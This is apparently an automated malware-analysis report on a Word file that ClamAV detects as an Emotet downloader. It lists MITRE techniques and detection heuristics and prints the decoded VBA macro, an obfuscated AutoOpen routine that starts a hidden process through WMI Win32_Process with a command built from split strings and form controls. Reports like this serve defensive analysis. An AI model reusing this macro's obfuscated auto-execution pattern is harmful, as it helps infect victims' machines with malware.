MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen subroutine, a common Emotet infection vector. The script uses obfuscated API calls to GetObject and CreateObject to instantiate WMI objects for launching a new process. The ClamAV detection explicitly names Emotet, and the heuristics confirm the use of WMI to create a process, a known Emotet behavior.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1397 bytes |
SHA-256: fd7abb310ac2c1edcee951b9d468862e54c8b1b7d6bab48a5b9081c9e2a7eba6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "j20773"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "f16571_8, 0, 0, MSForms, TextBox"
Attribute VB_Control = "M3956486, 1, 1, MSForms, TextBox"
Attribute VB_Name = "p4_524"
Sub _
autoopen( _
)
k__10326 = E90743 + (z_7_90) _
+ (z19485_) + h8221927 _
+ (z5649586) + 381563743 + (U9892_48) _
+ p077792 + 929270445
Set w99__132 = GetObject("WiN" + "MgMts:w" + "In32_PRocEssStArTuP")
F03591 = L_8862_ + (X570149) _
+ (c7246_) + Q649685 _
+ (h1_31463) + 214625856 + (X44619__) _
+ a95995_8 + 921067876
w99__132. _
ShowWindow = vbFalse - vbFalse
i99_64 = s2_662 + (W25_22) _
+ (W25_3822) + n0665721 _
+ (M242343) + 396479855 + (T8110_) _
+ o21088 + 395668256
Set M6954__8 = GetObject("WiN" + "MgMts:w" + "In32_PRocEss")
p0262640 = u_292945 + (D2_12__) _
+ (U7558234) + h315_74 _
+ (U09_55) + 675873911 + (D25_54) _
+ Z757_5 + 22867151
M6954__8.Create B81600 + "po" + H781___ + j20773.M3956486 + j20773.f16571_8 + E19096, l76659, w99__132, J8637461
b5768_ = t492226 + (D59_19_) _
+ (a7_71__) + X8422294 _
+ (A758971) + 419017801 + (t621_4) _
+ M392_41 + 419384232
End Sub
Attribute VB_Name = "j38572"
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.